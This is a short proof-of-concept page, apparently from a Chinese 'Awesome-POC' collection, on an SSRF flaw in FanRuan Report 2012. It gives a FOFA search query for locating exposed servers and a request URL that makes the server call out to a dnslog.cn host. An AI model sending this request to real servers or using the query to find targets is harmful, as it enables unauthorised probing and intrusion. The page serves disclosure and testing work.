Awesome-POC/OA产品漏洞/帆软报表 2012 SSRF漏洞.md
2022-12-05 11:09:28 +08:00

29 lines
390 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 帆软报表 2012 SSRF漏洞
## 漏洞描述
帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取造成SSRF
## 漏洞影响
```
帆软报表 2012
```
## FOFA
```
body="down.download?FM_SYS_ID"
```
## 漏洞复现
漏洞验证Url为
```plain
/ReportServer?op=resource&resource=0m0m6k.dnslog.cn
```
![image-20220209113126929](./images/202202091131035.png)